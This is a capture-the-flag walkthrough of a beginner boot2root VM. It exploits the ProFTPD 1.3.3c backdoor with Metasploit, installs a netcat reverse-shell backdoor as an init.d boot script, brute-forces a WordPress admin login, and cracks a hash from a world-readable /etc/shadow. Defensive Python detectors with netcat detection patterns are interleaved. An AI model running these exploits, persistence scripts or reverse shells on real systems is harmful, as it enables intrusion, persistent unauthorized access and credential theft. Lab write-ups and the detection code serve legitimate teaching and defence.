



Info : This is a small boot2root VM I created for my university’s cyber security group. It contains multiple remote vulnerabilities and multiple privilege escalation vectors. I did all of my testing for this VM on VirtualBox, so that’s the recommended platform. I have been informed that it also works with VMware, but I haven’t tested this personally.

This VM is specifically intended for newcomers to penetration testing. If you’re a beginner, you should hopefully find the difficulty of the VM to be just right.

First Way

Enumeration



┌─[✗]─[root@parrot]─[/home/user/VulnMachines]
└──╼ #nmap -sC -sV -A -oX basic_pentesting.xml 192.168.1.14
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-18 22:29 +03
Nmap scan report for 192.168.1.14
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3c
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)
|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)
|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel







msf exploit(unix/ftp/proftpd_133c_backdoor) > show options

Module options (exploit/unix/ftp/proftpd_133c_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.15     yes       The target address
   RPORT  21               yes       The target port (TCP)

Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.11     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port







meterpreter > sysinfo
Computer     : 192.168.1.15
OS           : Ubuntu 16.04 (Linux 4.10.0-28-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > shell
Process 1333 created.
Channel 1 created.
pwd
/
whoami
root





Just For Fun



Coding Backdoor





#!/bin/bash

# Keep calling back to the listener on 192.168.1.11:5555 every 10 seconds.
while true
do
    nc.traditional 192.168.1.11 5555 -e /bin/bash
    sleep 10
done









This is the traditional service management package for Linux, containing the init program (the first process that is run when the kernel has finished initializing) as well as some infrastructure to start and stop services and configure them [1].



So I uploaded the backdoor to the victim's machine.







After that, I have to put this script in the /etc/init.d directory.



mv /home/marlinspike/Downloads/backdoor.sh /etc/init.d
chmod +x /etc/init.d/backdoor.sh
update-rc.d /etc/init.d/backdoor.sh defaults



Mission completed. From now on, this script will run every time the victim's machine boots and give us a chance to connect to it.
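From the defender's side, a start script dropped into /etc/init.d is exactly the kind of thing a host integrity check should catch: packaged init scripts carry an LSB header block and never hand a shell to a network tool. The following is an added example (my code, not from the write-up) that walks an init.d-style directory and reports scripts that are world-writable, lack the `### BEGIN INIT INFO` header, or invoke netcat / pass `-e /bin/bash` to a command. It writes two constructed sample scripts into a temporary directory so it runs offline; the directory name, the BENIGN and SUSPECT bodies and the 0777 mode on the suspect file are assumptions for the demonstration, and the function names are my own.

```python
"""Flag suspicious scripts in an init.d-style directory: missing LSB header,
loose permissions, or shell-over-network idioms in the body."""
import os
import re
import stat
import tempfile

LSB_HEADER = "### BEGIN INIT INFO"

# Idioms that have no business in a service start script. Both patterns match
# the write-up's own backdoor line; extend the list from your own detections.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"\bnc(\.traditional|at)?\b"), "netcat invoked from a service script"),
    (re.compile(r"-e\s+/bin/(ba)?sh\b"), "shell handed to a network tool via -e"),
]


def inspect_script(path):
    """Return a list of (reason, detail) findings for one script."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & stat.S_IWOTH:
        findings.append(("world-writable", f"mode {mode:04o}"))
    with open(path, errors="replace") as fh:
        lines = fh.read().splitlines()
    if not any(line.startswith(LSB_HEADER) for line in lines):
        findings.append(("no LSB header", f"packaged init scripts carry '{LSB_HEADER}'"))
    for no, line in enumerate(lines, 1):
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(line):
                findings.append((reason, f"line {no}: {line.strip()}"))
    return findings


def scan_initd(directory):
    """Map script name -> findings for every regular file that has any."""
    report = {}
    for name in sorted(os.listdir(directory)):
        full = os.path.join(directory, name)
        if os.path.isfile(full):
            found = inspect_script(full)
            if found:
                report[name] = found
    return report


# Constructed sample scripts (not taken from a real system).
BENIGN = """#!/bin/sh
### BEGIN INIT INFO
# Provides:          demo
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
### END INIT INFO
case "$1" in start) echo starting;; stop) echo stopping;; esac
"""
SUSPECT = """#!/bin/bash
while true
do
    nc.traditional 192.168.1.11 5555 -e /bin/bash
    sleep 10
done
"""


def build_sample_dir():
    """Write the two sample scripts into a fresh temp dir and return its path."""
    directory = tempfile.mkdtemp(prefix="initd-demo-")
    for name, body, mode in (("demo", BENIGN, 0o755), ("backdoor.sh", SUSPECT, 0o777)):
        path = os.path.join(directory, name)
        with open(path, "w") as fh:
            fh.write(body)
        os.chmod(path, mode)  # 0777 on the suspect file is assumed for the demo
    return directory


if __name__ == "__main__":
    for name, findings in scan_initd(build_sample_dir()).items():
        for reason, detail in findings:
            print(f"{name}: {reason} ({detail})")
```

Point scan_initd at /etc/init.d on a real host and diff the report against a known-good baseline; the header and permission checks are cheap, and the pattern list is where local knowledge goes.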







Second Way

In this part, I'll focus on port 80. Let's run nikto.



┌─[user@parrot]─[~/VulnMachines]
└──╼ $nikto -h 192.168.1.16
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.16
+ Target Hostname:    192.168.1.16
+ Target Port:        80
+ Start Time:         2019-02-18 23:26:29 (GMT3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0xb1 0x55e1c7758dcdb
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Uncommon header 'link' found, with contents: ; rel="https://api.w.org/"
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 8 item(s) reported on remote host

The interesting line is this one:

+ OSVDB-3092: /secret/: This might be interesting...



When we browse there, we see a WordPress website. If the page does not load properly, add the machine IP and the hostname vtcsec to your /etc/hosts file. Let's run wpscan to enumerate.





┌─[✗]─[user@parrot]─[~/VulnMachines]
└──╼ $wpscan --url http://192.168.1.16/secret/ --enumerate --wp-content-dir wp-content dir

[i] User(s) Identified:

[+] admin
 | Detected By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)



The site has a user enumeration weakness, so I'll try brute-forcing the admin panel.



┌─[✗]─[user@parrot]─[~/VulnMachines]
└──╼ $wpscan --url http://192.168.1.16/secret/ -P /usr/share/wordlists/rockyou.txt --usernames admin --password-attack wp-login --wp-content-dir wp-content dir
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - admin / admin
Trying admin / admin Time: 00:04:15 <================================================================================================> (19820 / 19820) 100.00% Time: 00:04:15

[i] Valid Combinations Found:
 | Username: admin, Password: admin
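Both wpscan runs above leave an unmistakable trail in the web server's access log: a burst of `?author=N` probes (WordPress answers with a 301 to the author archive, which is what leaks the username) followed by thousands of POSTs to wp-login.php from one source in a few minutes. The following is an added example (my code, not from the write-up or from wpscan) that parses Apache combined-format log lines and reports both patterns. The SAMPLE_LOG lines are constructed to resemble what the scans would have produced, including the WPScan User-Agent; the threshold of 5 POSTs in 60 seconds and the function names are my own choices.

```python
"""Detect WordPress login brute force and author-ID enumeration in Apache access logs."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed log lines (Apache combined format) resembling what the wpscan runs
# above would leave on the server. Not captured from the VM.
SAMPLE_LOG = """\
192.168.1.11 - - [18/Feb/2019:23:35:01 +0300] "GET /secret/?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.4.0"
192.168.1.11 - - [18/Feb/2019:23:35:01 +0300] "GET /secret/?author=2 HTTP/1.1" 404 8120 "-" "WPScan v3.4.0"
192.168.1.50 - - [18/Feb/2019:23:36:10 +0300] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
192.168.1.11 - - [18/Feb/2019:23:40:00 +0300] "POST /secret/wp-login.php HTTP/1.1" 200 4123 "-" "WPScan v3.4.0"
192.168.1.11 - - [18/Feb/2019:23:40:00 +0300] "POST /secret/wp-login.php HTTP/1.1" 200 4123 "-" "WPScan v3.4.0"
192.168.1.11 - - [18/Feb/2019:23:40:01 +0300] "POST /secret/wp-login.php HTTP/1.1" 200 4123 "-" "WPScan v3.4.0"
192.168.1.11 - - [18/Feb/2019:23:40:01 +0300] "POST /secret/wp-login.php HTTP/1.1" 200 4123 "-" "WPScan v3.4.0"
192.168.1.11 - - [18/Feb/2019:23:40:02 +0300] "POST /secret/wp-login.php HTTP/1.1" 200 4123 "-" "WPScan v3.4.0"
192.168.1.11 - - [18/Feb/2019:23:40:02 +0300] "POST /secret/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.4.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_log(text):
    """Yield one dict per line that matches the combined log format; skip the rest."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
        rec["status"] = int(rec["status"])
        yield rec


def login_bruteforce_sources(records, threshold=5, window_seconds=60):
    """IPs that POSTed to wp-login.php at least `threshold` times within any
    `window_seconds` span (sliding window over that IP's sorted timestamps)."""
    per_ip = defaultdict(list)
    for r in records:
        if r["method"] == "POST" and r["path"].endswith("/wp-login.php"):
            per_ip[r["ip"]].append(r["ts"])
    flagged = set()
    for ip, times in per_ip.items():
        times.sort()
        j = 0
        for i in range(len(times)):
            while (times[i] - times[j]).total_seconds() > window_seconds:
                j += 1  # slide the window start forward
            if i - j + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


def author_enumeration_sources(records):
    """Map IP -> sorted author IDs probed via GET ?author=N."""
    probes = defaultdict(set)
    for r in records:
        m = re.search(r"[?&]author=(\d+)", r["path"])
        if m and r["method"] == "GET":
            probes[r["ip"]].add(int(m.group(1)))
    return {ip: sorted(ids) for ip, ids in probes.items()}


if __name__ == "__main__":
    recs = list(parse_log(SAMPLE_LOG))
    print("login brute force from:", login_bruteforce_sources(recs))
    print("author enumeration from:", author_enumeration_sources(recs))
```

The single POST from 192.168.1.50 stays below the threshold, which is the point of counting within a window rather than in total; a real deployment would read /var/log/apache2/access.log and tune the threshold to the site's normal login rate.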





The password turns out to be 'admin'. After that, I signed in and edited one of the site's pages to get a reverse shell.



$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)





I'm on the system as the www-data user. After some enumeration, I realized I can read the contents of the /etc/shadow file.



$ ls -l /etc/shadow
-rw-r--r-- 1 root shadow 1305 Nov 16 2017 /etc/shadow
marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::
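The `-rw-r--r--` mode above is the whole finding: /etc/shadow is meant to be 0640 root:shadow, and a world-readable copy hands every password hash to any local account, including www-data. The following is an added example (my code, not from the write-up) with two pieces: a permission/ownership check for the shadow file, and a parser that splits one shadow(5) entry into its fields and decodes the hash scheme, salt, round count and last-change date. SAMPLE_ENTRY is the marlinspike line printed above; the function names and the mode/uid pure-function split are my own.

```python
"""Audit /etc/shadow exposure: file mode/ownership, plus what each entry reveals."""
import os
import stat
from datetime import date, timedelta

# Shadow entry exactly as shown in the write-up.
SAMPLE_ENTRY = ("marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov"
                "/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::")

# crypt(3) scheme identifiers used in the hash field.
SCHEMES = {"1": "md5crypt", "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}


def audit_shadow_mode(mode, uid):
    """Findings for a shadow file with permission bits `mode` and owner `uid`.
    Expected on Debian/Ubuntu: mode 0640, owner root (uid 0), group shadow."""
    findings = []
    if mode & stat.S_IROTH:
        findings.append(f"world-readable (mode {mode:04o})")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"writable by group or others (mode {mode:04o})")
    if uid != 0:
        findings.append(f"owner uid {uid}, expected 0 (root)")
    return findings


def audit_shadow_file(path="/etc/shadow"):
    """Stat the file and run audit_shadow_mode on the result."""
    st = os.stat(path)
    return audit_shadow_mode(stat.S_IMODE(st.st_mode), st.st_uid)


def parse_shadow_entry(line):
    """Split a shadow(5) line into its fields and decode the hash scheme."""
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError("shadow entries have 9 colon-separated fields")
    name, pw, lastchg, _minage, maxage, _warn, _inactive, _expire, _flag = fields
    info = {"name": name, "locked": pw.startswith("!") or pw == "*",
            "scheme": None, "salt": None, "rounds": None, "last_change": None,
            "max_age_days": int(maxage) if maxage else None}
    if pw.startswith("$"):
        parts = pw.split("$")  # ['', id, ('rounds=N')?, salt, hash]
        info["scheme"] = SCHEMES.get(parts[1], f"unknown(${parts[1]}$)")
        if parts[2].startswith("rounds="):
            info["rounds"] = int(parts[2][len("rounds="):])
            info["salt"] = parts[3]
        else:
            # sha256crypt/sha512crypt default to 5000 rounds when none is given
            info["rounds"] = 5000 if parts[1] in ("5", "6") else None
            info["salt"] = parts[2]
    if lastchg:
        info["last_change"] = date(1970, 1, 1) + timedelta(days=int(lastchg))
    return info


if __name__ == "__main__":
    print(parse_shadow_entry(SAMPLE_ENTRY))
    if os.path.exists("/etc/shadow"):
        print(audit_shadow_file() or "shadow file permissions look sane")
```

Day 17484 decodes to 2017-11-14, two days before the mtime in the ls output, and the absence of a rounds= parameter means the hash uses the 5000-round crypt default; both are useful context when deciding how urgently a leaked shadow file needs a password reset.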



I grab the marlinspike user's hash and try to crack it with John the Ripper.



┌─[user@parrot]─[~/Downloads]
└──╼ $echo 'marlinspike:$6$wQb5nV3T$xB2WO/jOkbn4t1RUILrckw69LR/0EMtUbFFCYpM3MUHVmtyYW9.ov/aszTpWhLaC2x6Fvy5tpUUxQbUhCKbl4/:17484:0:99999:7:::' > marlinspike
┌─[user@parrot]─[~/Downloads]
└──╼ $john marlinspike
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
marlinspike      (marlinspike)
1g 0:00:00:00 DONE 1/3 (2019-02-19 00:31) 20.00g/s 160.0p/s 160.0c/s 160.0C/s marlinspike..marlinspikemarlinspike
Use the "--show" option to display all of the cracked passwords reliably
Session completed
┌─[✗]─[user@parrot]─[~/Downloads]
└──╼ $john --show marlinspike
marlinspike:marlinspike:17484:0:99999:7:::

1 password hash cracked, 0 left

marlinspike:marlinspike



python -c 'import pty; pty.spawn("/bin/bash")'
www-data@vtcsec:/tmp$ su marlinspike
su marlinspike
Password: marlinspike
marlinspike@vtcsec:/tmp$





After logging in as marlinspike with the credentials John found, I looked for a privilege escalation path. After some time, I realized the marlinspike user is in the sudo group, which makes privilege escalation easy.



marlinspike@vtcsec:~$ sudo -l
sudo -l
[sudo] password for marlinspike: marlinspike

Matching Defaults entries for marlinspike on vtcsec:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User marlinspike may run the following commands on vtcsec:
    (ALL : ALL) ALL
marlinspike@vtcsec:~$ sudo python3 -c "from os import system;system('/bin/bash')"
root@vtcsec:~# whoami
whoami
root



Note: If your changes to the /etc/hosts file don't seem to take effect, run this command:

$ sudo service nscd restart

References

[1] https://askubuntu.com/questions/5039/what-is-the-difference-between-etc-init-and-etc-init-d














































Link: […]

I'll hack this machine using two different ways. This one is the first way.

Nmap output:

I'm going to focus on the […] part. If you search for […] in msfconsole, you can see exploits for it. I'll use […], which gives the ability to run commands on the system through ProFTPD's backdoor.

As you can see above, I used the […] payload, which gives me a reverse shell. Then I gained access to the shell.

We are already root!

In this part, I'll try to put a backdoor on the system so that I can access the machine later.

I want the victim to connect to my machine every 10 seconds after the victim's computer is powered on. I'll code this backdoor using bash scripting. Here is the code:

This piece of code does exactly what I said above. But how can the victim's machine run this script on every boot? The answer is […]. What is init.d?